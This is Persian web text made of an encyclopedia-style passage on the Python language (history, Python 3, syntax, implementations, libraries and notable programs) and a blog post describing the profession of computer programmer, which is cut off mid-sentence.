تجزیه‌کننده SAX در ورژن ۲٫۰ و ساختمان‌های نحو که در ورژن ۲٫۴ اضافه شد.توسعه خصوصیاتیک طرح افزایش (PEP) در پایتون یکنواخت کردن اسنادی است که اطلاعات عمومی ای را که پایتون را شرح می‌دهند تولید می‌کنند؛ شامل پیشنهادها، توصیف‌ها و توضیح‌ها برای خصوصیات زبان. PEP در نظر داشت همانند روش‌های اولیه، برای پیشنهاد خصوصیات جدید و نیز برای مستندسازی طرح‌های اساسی، هر عامل بزرگ در پایتون را توضیح دهد. طرح‌های برجسته توسط van Rossum تجدید نظر شده و توضیح داده شدند.پایتون ۳پایتون ۳٫۰ (که پایتون ۳۰۰۰ ویا Py3k نیز خوانده می‌شود) به منظور شکستن سازگاری عقبرو (به انگلیسی: backward compatibility) یا به عبارتی قطع سازگاری با گذشته پایتون ۲ و بهبود خطاها و رخنه‌ها در نسخهٔ ۲ و همچنین حذف روش‌های قدیمی طراحی شد. به عبارتی دیگر لازم نیست که پایتون ۳ بتواند کدی که با پایتون ۲ نوشته شده را تفسیر کند که البته این مشکل توسط نرم‌افزار 2to3 حل می‌شود.فلسفهپایتون ۳٫۰ با همان فلسفه ورژن‌های قبل، در حال توسعه یافتن است، بنابراین هر منبعی در فلسفه پایتون، در پایتون ۳٫۰ به خوبی ظاهر خواهد شد. اگر چه، همان‌طور که پایتون روش‌های جدید در برنامه‌ریزی را جمع‌آوری کرده، پایتون ۳٫۰ تأکید زیادی بر از بین بردن ساختارها و ماژول‌های تکراری دارد: «باید یک – و ترجیحاً فقط یک – روش بدیهی برای انجام آن وجود داشته باشد.» با این وجود پایتون ۳٫۰ به ساختار زبان چند نمونه‌ای ادامه خواهد داد. کد نویس‌ها همچنان اختیارات شیء گرایی، برنامه‌نویسی ساخت یافته، برنامه‌نویسی تابعی و دیگر نمونه‌ها را دارند، اما در انتخاب‌های وسیع، جزئیات در پایتون ۳٫۰ آشکارتر از پایتون سری x.۲ هستند.سازگاری و همزمانیاولین کاندید پایتون ۳٫۰ در ۱۷ سپتامبر ۲۰۰۸منتشر شد. پایتون سری ۲.x و ۳.x به‌طور موازی با هم وجود خواهند داشت، جایی که سری ۲.x سازگاری بیشتری دارد، به جای سری ۳.x مورد استفاده قرار خواهد گرفت. PEP ۳۰۰۰ اطلاعات بیشتری را در مورد فهرست نشریات دارا ست. پایتون ۳٫۰ سازگاری قبل را نقض خواهد کرد. الزامی ندارد که کدهایی که با پایتون ۲.x اجرا می‌شوند، برای پایتون ۳٫۰ بدون تغییر اجرا شوند. چون تغییرات اساسی بین این دو ورژن وجود دارد مثل اختلاف در حالت پرینت (بنابراین هر استفاده از پرینت به عنوان توضیح باعث شکست برنامه می‌شود) نوع پویای پایتون با طرح‌های تغییر معنای روش‌های خاص دیکشنری ترکیب می‌شود، به عنوان مثال، انتقال مکانیکی بی نقص از پایتون ۲.x به پایتون ۳٫۰ را بسیار دشوار می‌کند. اگرچه ابزاری به نام «۲to۳» بسیاری از این وظایف انتقال را انجام می‌دهد، اما باید توجه داشت که استفاده از توضیحات یا اخطارها با ابهام همراه است. البته در یک مرحله از الفبا، ۲to۳ انتقال را حقیقتاً کامل انجام می‌دهد. PEP ۳۰۰۰ پیشنهاد می‌کند که یک منبع نگه داشته شود (برای سری ۲.x)، و نسخه‌ای بر مبنای پایتون ۳٫۰ با استفاده از ۲to۳ تولید شود. کدهای نتیجه شده نباید تصحیح شوند، مگر اینکه کدی طولانی‌تر از محدوده سری ۲.x باشد. پایتون ۲٫۶ شامل خصوصیات سازگاری مستقیم است، به‌طوری‌که یک روش اخطار (warning) به صورت خودکار به مسائل انتقال هشدار می‌دهد. هشدارها باید برای تشخیص خطا گزارش داده شوند، مشابه خصوصیات ورژن‌های قبلی پایتون. (برای اطلاعات بیشتر به PEP ۳۶۱ رجوع کنید)خصوصیاتفهرست برخی از تغییرات عمده پایتون ۳٫۰:تغییر پرینت چون یک تابع غیرقابل انتقال است نه یک توضیح. این باعث می‌شود که تغییر یک ماژول برای استفاده از یک تابع پرینت متفاوت، آسان باشد و بنابراین ایجاد نحو منظم تر می‌شود. در پایتون ۲٫۶ این امکان با تایپ کردن from – future – import print – function فراهم شد.اضافه شدن حمایت از یادآوری تابع انتخابی که می‌تواند برای معرفی تایپ خصوصی یا اهداف دیگر استفاده شود.یکسان کردن تایپ str/Unicode، به نمایندگی از یک متن، و معرفی یک تایپ byte تغییرناپذیر؛ با یک تایپ مطابق با bytearray تغییرپذیر، که هر دو آرایه از بایت را ارائه می‌کنند.از بین بردن خصوصیات سازگاری معکوس، شامل کلاس‌های به فرم قبل، قسمت کردن اعداد صحیح، استثناءهای رشته‌ای، و گزارش‌های نسبتاً نا آشکار.کاربردسازمان‌های بزرگی که از پایتون استفاده می‌کنند، شامل گوگل، یاهو، سرن و ناسا هستند. ITA نیز از پایتون برای بعضی از اجزای خود استفاده می‌کند.امنیت اطلاعاتاز پایتون همچنین استفاده وسیعی در صنعت ایمنی اطلاعات می‌شود. مثلاً در چندین ابزار پیشنهاد شده توسط تأمین امنیت و امنیت مرکزی و اسکنر امنیت کاربردی وب واپیتی. پایتون معمولاً در توسعه کاربرد مورد استفاده قرار می‌گیرد.جاسازیپایتون با موفقیت در تعدادی از تولیدات نرم‌افزاری مثل زبان فایل آغاز گر تعبیه شده‌است. پایتون معمولاً در بسته‌های انیمیشن ۳D استفاده می‌شود، مانند Houdini, Maya, Softimage XSI, TrueSpace, Poser, Modo, Nuke, Blender. GIMP, کریتا، Inkcape و Scribus, Paint Shop Pro.شرکت ازری (ESRI) هم‌اکنون در حال ترقی دادن پایتون به عنوان بهترین انتخاب برای نوشتن فایل آغازگر در آرک جی‌آی‌اس (ArcGIS) است. همچنین در بازی‌ها استفاده می‌شود، مانند Civilization IV و Mount&Blade به عنوان زبان کنترل برای نمایش و عکس‌العمل حوادث.مقبولیتدر بسیاری از سیستم‌های عملیاتی، پایتون یک جزء استاندارد است؛ چون با بیشتر بخش‌های لینوکس انتقال داده می‌شود و روی NetBSD و OpenBSD و Mac OS X هم قابل نصب است. ردهت لینوکس و فدورا هر دو از نصب‌کننده پایتونی آناکوندا استفاده می‌کنند. لینوکس Gentoo از پایتون در سیستم مدیریت بسته، حمل و ابزارهای دستیابی خود استفاده می‌کند. Pardus از آن برای مدیریت و در طول راه‌اندازی سیستم استفاده می‌کند.مخترع زبان پایتون خودو فان روسوم دستور زبانپایتون در نظر دارد که زبانی بسیار قابل خواندن باشد؛ بنابراین به سمت یک طرح بندی ویژوال بدون پارازیت می‌رود، و اغلب از کلمات کلیدی انگلیسی استفاده می‌کند، در صورتی‌که دیگر زبان‌ها از نقطه‌گذاری استفاده می‌کنند. پایتون نسبت به زبان‌های ساخت یافته سنتی، مثل C و پاسکال، نیاز به تکیه کلام‌های کمتر و همچنین استثناءهای نحوی و موارد خاص کمتری دارد.ایجاد فضای خالیپایتون از فضاهای خالی بیشتر از آکولاد یا کلمات کلیدی برای تعیین بلوک‌های حالت استفاده می‌کند (ویژگی ای که به نام قانون off-side نیز شناخته می‌شود)شرط‌ها و روند کنترلشرط‌های پایتون شامل:شرط if، که یک بلوک کد، تا else و elif را اجرا می‌کند. (یک اختصار از else-if)شرط for، که روی یک شیء تکرار شدنی تکرار می‌شود، به هر متغیر محلی مقدار داده می‌شود برای استفاده توسط بلوک مربوط.شرط class، که یک بلوک کد را اجرا می‌کند و فضاهای محلی آن را به یک کلاس ملحق می‌کند، برای استفاده در برنامه‌نویسی شیء گرا.شرط def، که یک تابع را تعریف می‌کند.شرط with، که یک بلوک کد را به یک مدیر متن ضمیمه می‌کند. (به عنوان مثال، اندوختن یک قفل قبل از اجرای بلوک کد و آزاد کردن قفل بعد از اجرا)هر شرطی برای خود قواعد معنایی خاصی دارد: به عنوان مثال، شرط def، بر خلاف دیگر شرط‌ها بلوک خود را فوراً اجرا نمی‌کند.سی پایتون استمرار را پشتیبانی نمی‌کند، و مطابق نظر خَودو فان روسوم هرگز نخواهد کرد. در ورژن‌های قبلی مولد تکرار کند بود چون اطلاعات تنها در یک جهت از مولد عبور می‌کردند.روش‌هاروش‌ها در اشیاء پایتون، ملحق کردن توابع به اشیاء کلاس است؛ با نحو (instance.method(argument برای روش‌ها و توابع نرمال، و(Class.method (instance,argument. روش‌های پایتون، یک پارامتر self آشکار برای دستیابی به داده‌های instance دارند، در برابر پارامتر self غیر آشکار در برخی زبان‌های برنامه‌نویسی شیء گرا (مانند جاوا، C++، یا روبی)نوع دهیپایتون از اشیاء تایپ شده و در مقابل نام متغیرهای غیر تایپ استفاده می‌کند. محدودیت تایپ در زمان کامپایل چک نمی‌شود؛ بنابراین عمل گرهای روی یک شیء ممکن است شکست بخورند، به این مفهوم که شیء داده شده از یک تایپ مناسب نیست. با اینکه اجباری در تایپ دهی ایستا نیست، پایتون شدیداً تایپ دهی شده، و عمل گرهای نامناسب را نهی می‌کند. (مثل مقدار دهی یک رشته با یک عدد)پایتون همچنین به برنامه‌نویس‌ها اجازه می‌دهد که تایپ دلخواه خود را تعریف کنند. این کار با استفاده از کلاس‌ها امکان‌پذیر است، و اغلب برای شیء گرایی در برنامه‌نویسی استفاده می‌شود. نمونه‌های جدید از کلاس‌ها با صدا زدن کلاس ساخته می‌شوند، و کلاس‌ها خودشان نمونه‌هایی از کلاس type هستند (خودش یک نمونه از خودش است).Syntax-highlighted Python 2.x code. پیاده‌سازیمسیر اصلی پیاده‌سازی پایتون، که با عنوان سی پایتون نیز شناخته می‌شود، در نشست C در استاندارد C۸۹ نوشته شد. سی پایتون برنامه‌های پایتون را به کد بایت تبدیل می‌کند، که سپس توسط ماشین مجازی اجرا می‌شود. سی پایتون با یک کتابخانه استاندارد بزرگ که به صورت مخلوطی از C و پایتون نوشته شده، توزیع شده‌است. سی پایتون در ورژن‌های مختلف برای پایگاه‌های زیادی کار می‌کند، شامل مایکروسافت ویندوز و بیشتر سیستم‌های پیشرفته یونیکس. استفاده و توسعه آن روی پایگاه‌های محرمانه مانند Amoeba، در کنار پایگاه‌های متداول مانند یونیکس یا مکینتاش، به‌طور عمده در این نظر کمک شده‌است.پایتون بدون پشته، انشعابی از سی پایتون است که ریز برنامه‌ها را اجرا می‌کند؛ و از پشته حافظه استفاده نمی‌کند. سی پایتون از GIL استفاده می‌کند تا وقتی برنامه پایتون بدون پشته، وابسته به OS است و می‌تواند به صورت هم‌زمان اجرا شود، در هر لحظه فقط به یک زیر برنامه اجازه اجرا داده شود. پایتون برای استفاده در میکرو کنترلرها یا وظایف محدود دیگر پایگاه‌های مرجع، متناسب تر است. پیش‌بینی می‌شود که پایتون بدون پشته بتواند تقریباً روی همان پایگاهی که سی پایتون اجرا می‌شود، اجرا شود.جایتون (به انگلیسی: Jython) برنامه‌های پایتون را به کد بایت جاوا کامپایل می‌کند، که بدین ترتیب می‌تواند با هر ماشین مجازی جاوا اجرا شود؛ و همچنین این امکان فراهم می‌شود که توابع کتابخانه‌ای کلاس جاوا از برنامه پایتون به کار گرفته شود. آی رون پایتون از همین شیوه برای اجرای برنامه‌های پایتون روی چارچوب دات‌نت استفاده می‌کند.پای پای (به انگلیسی: PyPy) یک پیاده‌سازی تجربی از پایتون است که می‌تواند چندین تایپ از کد بایت را تولید نماید.چندین برنامه در بسته مفسر پایتون با برنامه‌های کاربردی (یا آغازگر) وجود دارد که مستقلاً اجرا می‌شوند مانند یونیکس، لینوکس، ویندوز، AmigaOS ۴ یا Mac OS X. بسیاری ازکتابخانه‌های سه قسمتی (و حتی بعضی از یک قسمتی‌ها) فقط روی ویندوز، لینوکس، BSD و Mac OS X موجود هستند.در نوکیا ۲۰۰۵ یک مفسر پایتون برای موبایل‌های سری ۶۰ با نام PyS۶۰ تولید شد که شامل بسیاری از ماژولها از سی پایتون بود، و همچنین برخی ماژول‌های اضافه شده برای یکپارچه شدن با سیستم‌عامل. این پروژه به منظور اجرا روی همه پایگاه‌های مختلف S۶۰، به روز نگاه داشته می‌شود.همچنین مفسری به نام پایتون سی ای برای ابزار ویندوز CE (شامل بسته PC) وجود دارد؛ که در آن ابزارهایی برای اجرای آسان و توسعه GUI اضافه شده‌است. اطلاعات بیشتر را می‌توانید روی وبگاه PythonCE بیابید.پایتون چینی زبان برنامه‌نویسی پایتونی است که از لغت‌نامه زبان چینی استفاده می‌کند. در کنار کلمات رزرو شده و نام متغیرها، بیشتر عمل گرهای تایپ داده، در چینی می‌توانند به خوبی کد دهی شوند.تفسیر معناییبیشتر پیاده‌سازی‌های پایتون (شامل سی پایتون، اولین پیاده‌سازی) می‌توانند به عنوان یک مفسر خط فرمان عمل کنند، برای زمانی که کاربر رشته شرط را وارد می‌کند و فوراً نتیجه را می‌پذیرد. خلاصه پایتون به عنوان یک برنامه واسط عمل می‌کند. وقتی صرف دیگر شیوه‌های اجرا (کامپایل کد بایت یا کامپایل کد محلی) به صورت یک رشته صرف ذخیره می‌شود، یک افزایش سرعت در هزینه‌های متقابل به وجود می‌آید، بنابراین آن‌ها معمولاً فقط خارج از مفسر خط فرمان استفاده می‌شوند. (وقتی یک ماژول وارد می‌شود)برنامه‌های واسط دیگر، امکانات تحت آن را در مفسر بیسیک افزایش می‌دهند، شامل IDLE و I Python. وقتی عموماً از برنامه واسط پایتون پیروی می‌شود، خصوصیاتی مشابه تکمیل خودکار، نگه داشتن زمان اجرای برنامه، و نشان دادن صرف پیاده‌سازی می‌شود.برخی از پیاده‌سازی‌ها نه تنها به صورت کد بایت می‌توانند کامپایل شوند، بلکه می‌توانند کد پایتون را به کد ماشین تبدیل کنند. تا کنون، این عمل فقط برای زیر مجموعه‌های انحصاری پایتون انجام شده‌است. پای پای این روش را پذیرفته و ورژن‌های قابل کامپایل انحصاری پایتون را RPython نامید.Psyco یک کامپایلر اختصاصی در زمان است که کد بایت را به کد ماشین، در زمان اجرا تبدیل می‌کند. کد تولید شده، اختصاصی برای تایپ‌های داده خاصی است و از کدهای استاندارد پایتون سریع تر است. Psyco با همه کدهای پایتون سازگار است، نه فقط یک زیر مجموعه.کتابخانه استانداردپایتون یک کتابخانه استاندارد بزرگ دارد، که از آن به عنوان یکی از بزرگ‌ترین توانایی‌های پایتون یاد می‌شود، مشروط به اینکه ابزارهای از پیش نوشته شده، با بسیاری از وظایف سازگار باشد. ماژول‌های کتابخانه استاندارد می‌توانند به شیوه ماژول‌های نوشته شده در سی یا پایتون آرگومان دهی شوند. اخیراً کتابخانه‌های C++ به یک کتابخانه به نام Boost.Python رشد یافته‌است، برای ایجاد قابلیت همکاری بین C++ و پایتون. به دلیل تنوع گسترده در ابزارهای تولید شده توسط کتابخانه استاندارد، این کتابخانه با توانایی استفاده یک زبان سطح پایین ترکیب شده، مثل C و C++، که البته به عنوان واسط بین کتابخانه‌های دیگر است، پایتون می‌تواند یک واسط قوی بین زبان‌ها و ابزارها باشد.کتابخانه استاندارد با تعداد زیاد فرمت‌ها و پروتکل‌هایی که حمایت می‌کند (مانند MIME و HTTP)، خصوصاً برای نوشتن علائم اینترنت مناسب است. ماژول‌ها برای ایجاد واسط کاربر گرافیکی، به پایگاه داده مربوط متصل می‌شود، محاسبات را با دقت دلخواه اعشاری انجام می‌دهد، و عبارت‌های منظم را دستکاری می‌کند. پایتون همچنین یک واحد تست مدیریت پایگاه داده برای تست کردن رشته‌ها دارد.بعضی از قسمت‌های کتابخانه استاندارد با مشخصات پوشانده شده، اما اکثریت ماژول‌ها این‌گونه نیستند. آن‌ها از طریق کدها، اسناد داخلی، و دنباله تست شان (اگر موجود باشد) تعیین می‌شوند. اگر چه، به دلیل اینکه اکثر کتابخانه‌های استاندارد، کد پایتون مربوط به پایگاه را دارند، فقط ماژول‌های اندکی هستند که باید تغییر داده شوند یا مجدّداً با یک پیاده‌سازی دیگر نوشته شوند.فلسفه برنامه‌نویسیپایتون یک زبان برنامه‌نویسی چند پارادایمی است، شیء گرایی و برنامه‌نویسی ساخت یافته کاملاً تحت پوشش هستند و تعدادی از خصوصیات زبان‌های برنامه‌نویسی هستند که برنامه‌نویسی تابعی و ظاهرسازی را پشتیبانی می‌کنند. پایتون از تایپ پویا و یک ترکیبی از شمارش مرجع و یک حلقه کشف و بازیافت قسمت‌های هدر رفته حافظه برای مدیریت حافظه، استفاده می‌کند. یک ویژگی مهم پایتون تحلیل نام پویا است، که روش‌ها و نام متغیرها را در طول اجرای برنامه به هم ملحق می‌کند.هدف دیگر طراحی زبان آسان کردن توسعه‌پذیری است. ماژول‌هایی که تازه ساخته شده‌اند، به‌سادگی در C و C++ نوشته می‌شوند. پایتون همچنین می‌تواند به عنوان زبان توسعه برای ماژول‌ها و کاربردهای موجود که به برنامه واسط قابل برنامه‌ریزی نیاز دارد، استفاده شود. این طرح که یک زبان هسته کوچک با یک کتابخانه استاندارد بزرگ و یک مفسر آسان توسعه پذیر همراه باشد، توسط Van Rossum بیان شد.طرح پایتون به پشتیبانی محدود برای برنامه‌نویسی تابعی به شیوه لیسپ، ارائه شد. اگر چه، تشابه‌های عمده‌ای بین پایتون و زبان خانواده لیسپ وجود دارد. این کتابخانه دو ماژول دارد (تکرار و تابعی) که ابزارهای تابعی را با اقتباس از هسکل و ام‌ال استاندارد پیاده‌سازی می‌کند.وقتی انتخاب‌هایی در روش‌شناسی کدها ارائه شد، پایتون نحوهای فراوان را کنار گذاشت. همچنان‌که با پرل، توسعه دهندگان پایتون فوراً یک فرهنگ یا ایدئولوژی را بر مبنای آنچه از یک زبان می‌خواهند، ترقی دادند، ساختار زبان‌ها زیبا، آشکار و ساده شد. Alex Martelli این مطلب را در کتاب خود قرار داد: “برای توضیح برخی مسائل، در فرهنگ پایتون تعریفی مطرح نشده‌است. «پایتون روش پرل را (بیش از یک روش در انجام آن وجود دارد) در طراحی زبان در حمایت از» باید یک راه – و ترجیحاً فقط یک راه – آشکار برای انجام آن وجود دارد." رد کرد.پایتون از بهینه‌سازی بی موقع اجتناب کرد، و به‌علاوه به هم جور کردن قسمت‌های غیرضروری سی پایتون را که افزایش سرعت نهایی در هزینه را ارائه می‌کرد، رد کرد. آن گاهی اوقات با نام ' slow ' شناخته می‌شود. اگر چه، بیشتر مسائل چندان بحرانی نیستند، و همین‌طور سرعت سخت‌افزار کامپیوتر با سرعت نمائی رو به رشد است. وقتی سرعت یک مسئله باشد، برنامه نویسان پایتون بیشتر تلاش می‌کنند تا عملیات محدود را با بهبود الگوریتم یا تغییر ساختار داده، بهینه کنند.واژه تراشییک واژه تراشی رایج در انجمن پایتون، در pythonic است، که می‌تواند محدوده وسیع معنایی وابسته به استیل برنامه داشته باشد. در مقابل یک کد unpythonic تلاش می‌کند تا یک کد ++C را در پایتون بنویسد. واسط گرافیکیبرای پایتون واسط گرافیکی کاربر بسیاری نوشته شده‌است پرکاربردترین آن‌ها به شرح زیر می‌باشد:تکینتر (به صورت پیش‌فرض همراه با نسخه‌های استاندارد پایتون ارائه می‌شود و یک رابط شیءگرا برای ابزار Tcl/Tk در محیط پایتون فراهم می‌کند)پای‌کیوتPyGTKwxPythonpyFLTKFXpyPyOpenGLبرنامه‌هایی که کاملاً یا بخشی از آن‌ها با پایتون نوشته شده‌استاینستاگرام (Instagram): نرم‌افزار اشتراک‌گذاری تصاویر و ویدیوهابیت‌تورنت (نرم‌افزار) (BitTorrent): نرم‌افزار کلاینت برای فایل‌های به اشتراک گذاشته شدهٔ (p2p) توسط پروتکل بیت‌تورنتچندلر (Chandler): مدیر اطلاعات شخصی شامل تقویم، میل، کارهای روزانه، یادداشت‌ها و…Civilization IV: یک گیم کامپیوتری بر مبنای پایتون که از boost.python استفاده می‌کندمیلمن (Mailman): یکی از معروفترین نرم‌افزارهای مرتبط با ایمیلکمبیلو (Kombilo): مدیر پایگاه داده و مرورگر بازی‌های goموین‌موین (MoinMoin): یکی از قدرتمندترین و معروفترین ویکی‌های موجودپلون (Plone): یک ابزار مدیریتی محتوایی اپن سورس، قدرتمند و کاربر پسندپورتاژ (Portage): قلب توزیع جنتو. یک مدیر بستهای سیستم لینوکسزوپ (zope): یک پلتفورم شیء گرای مبتنی بر وب. زوپ شامل یک سرور نرم‌افزار به همراه پایگاه داده شیء گرا و یک رابط مدیریتی درونی مبتنی بر وب می‌باشداس‌پی‌ای (SPE): یک IDE رایگان، اپن سورس برای سیستم‌عامل‌های ویندوز، لینوکس، مک که از wxGlade(طراحی رابط کاربر),PyChecker (دکتر کد) (Blender(3D پشتیبانی می‌کندیام (Yum): یک برنامه مدیریت بسته متن‌ باز برای توزیع‌های سازگار با آرپی‌ام.آباکوس(Abaqus):نرم‌افزار شبیه‌سازی با روش المان محدود که امکان اسکریپت‌نویسی به زبان پایتون را به کاربر می‌دهد.

ماهیت موجودی به نام برنامه نویس

localho3t — Wed, 29 Apr 2020 06:00:43 +0430

امیدوارم از این مطالب لذت ببرین D:برنامه‌نویس، برنامه‌نویس رایانه، توسعه‌دهنده، کدنویس، یا مهندس نرم‌افزار کسی است که نرم‌افزار رایانه می‌نویسد. عبارتبرنامه‌نویس رایانه می‌تواند به یک متخصص در زمینه‌ای از برنامه نویس یا یک شخص دارای سررشته که برای بسیاری از گونه‌های نرم‌افزار کد می‌نویسد اشاره کند. شخصی که یک روش رسمی برای برنامه‌نویسی تمرین یا تدریس می‌کند، همچنین می‌تواند به‌عنوان تحلیل‌گر برنامه‌نویس شناخته شود. زبان برنامه‌نویسی اصلی یک برنامه‌نویس (کوبول، سی، سی++، سی شارپ، جاوا، لیسپ، پایتون، غیره) اغلب دارای پیشوندی به این نام‌ها است، و کسانی که در محیط وب کار می‌کنند اغلب عنوان‌هایشان را با پیشوند وب می‌نویسند. عبارتبرنامه‌نویس می‌تواند برای اشاره به یک توسعه‌دهندهٔ نرم‌افزار، توسعه‌دهنده وب، توسعه‌دهندهٔ اپلیکیشن‌های تلفن همراه، توسعه‌دهندهٔ سخت‌افزار تعبیه‌شده، مهندس نرم‌افزار، دانشمند رایانه یا تحلیل‌گر نرم‌افزار به کار برده شود. هرچند، اعضای این حرفه‌ها دارای دیگر مهارت‌های مهندسی نرم‌افزار، جدا از برنامه‌نویسی هستند؛ به همین دلیل، عبارت برنامه‌نویس یا کد مانکی (به انگلیسی: code monkey) بعضی وقت‌ها توهین یا ساده‌گیری تحقیرآمیزِ این دیگر حرفه‌ها در نظر گرفته‌می‌شود.این مسئله بحث‌های زیادی میان توسعه‌دهنده‌ها، تحلیل‌گرها، دانشمندان رایانه، برنامه‌نویس‌ها و کسانی که همچنان سردرگم در تفاوت‌های ظریف در معانی این حرفه‌ها هستند برانگیخته است.ایدا لاولیس، ریاضی‌دان و کنتس انگلیسی نخستین برنامه‌نویس رایانه در نظر گرفته می‌شود، زیرا او نخستین شخصی بود یک الگوریتم را به قصد پیاده‌سازی روی موتور تحلیلی چارلز ببیج، در اکتبر ۱۸۴۲، به قصد محاسبهٔ عدد برنولی نوشت و منتشر کرد.چون که ماشین ببیج هرگز برای عملکرد استاندارد در زمان لاویس کامل نشد، او هرگز اجرای الگوریتم خود را ندید.نخستین شخصی که یک برنامه را روی یک عملکرد الکترونیکی مدرن مبتنی بر رایانه اجرا کرد، دانشمند رایانه کنراد تسوزه در سال ۱۹۴۱ بود.تیم برنامه‌نویسی انیاک، شامل کاتلین انتونلی، ژان بارتیک، بتی هالبرتن، مارلین ملتزر، فرانسیس اسپنس و روث تیتلبام نخستین اشخاصی بودند که به‌طور منظم برنامه‌نویسی کار می‌کردند.روز بین‌المللی برنامه‌نویس‌ها هر سال در ۷ ژانویه جشن گرفته‌می‌شود. در سال ۲۰۰۹، دولت روسیه فرمان داد تا هر سال یک روز تعطیل حرفه‌ای که با نام روز برنامه‌نویسان شناخته می‌شود در ۱۳ سپتامبر (۱۲ سپتامبر در سال‌های کبیسه) جشن گرفته شود. این روز همچنین پیش از آن یک روز تعطیل بین‌المللی غیررسمی بوده‌است.برنامه‌نویس‌های دانشجو در مؤسسهٔ فناوری در آلمان سال ۱۹۷۰برنامه‌نویس‌های رایانه می‌نویسند، آزمایش می‌کنند، اشکال‌زدایی می‌کنند و از دستورالعمل‌های دقیق، که برنامه‌های رایانه‌ای گفته می‌شوند و رایانه باید از آن‌ها برای اجرا توابع‌شان پیروی کنند، نگهداری می‌کنند. برنامه‌نویس‌ها همچنین تصور می‌کنند، طراحی می‌کنند و ساختارهای منطقی را برای برطرف کردن اشکال‌ها توسط رایانه آزمایش می‌کنند. بسیاری از نوآوری‌های فنی در برنامه‌نویسی — فناوری‌های رایانش پیشرفته، زبان‌های تازه پیچیده و ابزارهای برنامه‌نویسی — نقش برنامه‌نویس را دوباره تعریف کرده‌اند و بسیاری از کارهای برنامه‌نویسی که امروزه انجام می‌شوند را بسیار بهتر کرده‌اند. عنوان‌های شغلی و توصیف‌ها با توجه به آن سازمان ممکن است متفاوت باشند.برنامه‌نویس‌ها در بسیاری از محیط‌ها، از جمله بخش‌های سازمان فناوری اطلاعات، شرکت‌های نرم‌افزاری بزرگ، شرکت‌های خدمت‌رسانی کوچک و نهادهای دولتی کار می‌کنند. بسیاری از برنامه‌نویس‌های حرفه‌ای همچنین برای شرکت‌های مشاوره‌ای در محل‌های خدمت گیرنده به عنوان پیمانکار کار می‌کنند. اجازه‌نامه به‌طور معمول برای کار کردن به عنوان یک برنامه‌نویس نیاز نیست، اگرچه گواهی‌نامه‌های حرفه‌ای به‌طور معمول توسط برنامه‌نویس گرفته می‌شوند. برنامه‌نویسی به‌طور گسترده یک حرفه در نظر گرفته‌می‌شود (هرچند بعضی از[چه کسی؟] مقامات بر این اساس که فقط شغل‌هایی که پروانهٔ قانونی نیاز دارند به عنوان یک حرفه به حساب آیند اختلاف نظر دارند).کار برنامه‌نویس‌ها به‌طور گسترده‌ای بسته به نوع کسب و کاری که آن‌ها برای آن برنامه می‌نویسند متفاوت است. برای نمونه، دستورالعمل‌های درگیر در به‌روزرسانی سوابق مالی بسیار متفاوت از تکثیر کردن شرایط در یک هواپیما برای آموزش خلبانان در یک شبیه‌ساز پرواز هستند. برنامه‌های ساده می‌توانند در چند ساعت نوشته شوند، آنهایی که پیچیدگی بیشتری دارند ممکن است بیش از یک سال کار نیاز داشته‌باشند، این در حالی است که دیگر برنامه‌ها هرگز 'کامل' در نظر گرفته نمی‌شوند بلکه به‌طور مداوم تا زمانی که از آن‌ها استفاده می‌شود بهبود می‌یابند. در بیشتر موارد، چندین برنامه‌نویس با یکدیگر زیر نظر یک برنامه‌نویس ارشد به عنوان یک تیم کار می‌کنند.برنامه‌نویس‌ها مطابق مشخصات فنی که در درجهٔ اول توسط برنامه‌نویس‌های ارشد و تحلیل‌گرهای سیستم بیشتر تعیین شده‌اند برنامه می‌نویسند. پس از تکمیل فرایند طراحی، کار برنامه‌نویس است که آن طراحی را به دنباله‌های منطقی از دستورالعمل‌هایی که رایانه بتواند پیروی کند تبدیل کند. برنامه‌نویس کد این دستورالعمل‌ها را به یکی از بسیار زبان برنامه‌نویسی می‌نویسد. زبان‌های برنامه‌نویسی گوناگون بسته به هدف برنامه استفاده می‌شوند. کوبول، برای نمونه، به‌طور معمول برای اپلیکیشن‌های تجاری که معمولاً رویبزرگ‌ رایانه و رایانه کوچک اجرا می‌شوند استفاده می‌شود؛ در حالی که، فورترن در علم و مهندسی استفاده می‌شود. سی++ به‌طور گسترده برای هر دو اپلیکیشن‌های علمی و تجاری کاربرد دارد. جاوا، سی شارپ، ویژوال بیسیک و پی‌اچ‌پی زبان‌های برنامه‌نویسی محبوبی برای وب و نرم‌افزارهای کاربردی تجاری هستند. برنامه‌نویس‌ها عموماً بیش از یک زبان برنامه‌نویسی می‌دانند، و چون بیشتر زبان‌ها مشابه یکدیگر هستند، اغلب نسبتاً به آسانی زبان‌های تازه را فرا می‌گیرند. در عمل، برنامه‌نویس‌ها اغلب با زبانی که می‌دانند نسبت داده‌می‌شوند، برای نمونه برنامه‌نویس‌های جاوا، یا با نوع وظیفه‌ای که انجام می‌دهند یا محیطی که در آن کار می‌کنند، برای نمونه، برنامه‌نویس‌های پایگاه داده‌ها، برنامه‌نویس‌های بزرگ‌رایانه یا توسعه‌دهنده‌های وب.زمانی که در کد منبع، چیزی که برنامه‌ها از آن ساخته شده‌اند تغییر ایجاد شود، برنامه‌نویس‌ها باید دیگر برنامه‌نویس‌ها را از وظیفه‌ای که روزمره انجام می‌شود آگاه کنند. آن‌ها این کار را با نوشتن توضیحات در کد منبع و مستندسازی کدشان انجام می‌دهند؛ بنابراین، دیگر برنامه‌نویس‌ها برنامه را با آسانی بیشتر درک می‌کنند. برای صرفه‌جویی در کار، برنامه‌نویس‌ها اغلب از کتابخانه‌های کد پایه که می‌توانند تغییر یابند یا برای نرم‌افزار کاربردی مشخص سفارشی شوند استفاده می‌کنند. نتیجهٔ این روش برنامه‌های قابل اطمینان‌تر و سازگارتر است و همین‌طور سودمندی برنامه را با حذف برخی از مرحله‌های روزمره افزایش می‌دهد.آزمون و اشکال‌زدایبرنامه‌نویس‌ها برنامه را بار ها اجرا کرده و به دنبال خطا های احتمالی میگردند. زمانی که اشکال‌ها مشخص شدند، برنامه‌نویس معمولاً اصلاحات مناسب را ایجاد می‌کند، سپس برنامه را دوباره تا وقتی که یک سطح پایین و شدت قابل قبول از اشکال‌ها باقی بماند بررسی می‌کند. این فرایند را آزمودن و اشکال‌زدایی می‌گویند. اینها بخش‌های مهم از وظیفهٔ هر برنامه‌نویس است. برنامه‌نویس‌ها می‌توانند به برطرف کردن این اشکال‌ها سراسر زندگی یک برنامه ادامه دهند. به‌روزرسانی، تعمیر، ویرایش و گسترش برنامه‌های موجود تعمیر و نگهداری گفتهمی‌شود. برنامه‌نویس‌ها می‌توانند در راهنماهای کاربر و راهنمای برخط همکاری کنند، یا می‌توانند با نویسندهٔ فنی برای انجام چنین کاری کار 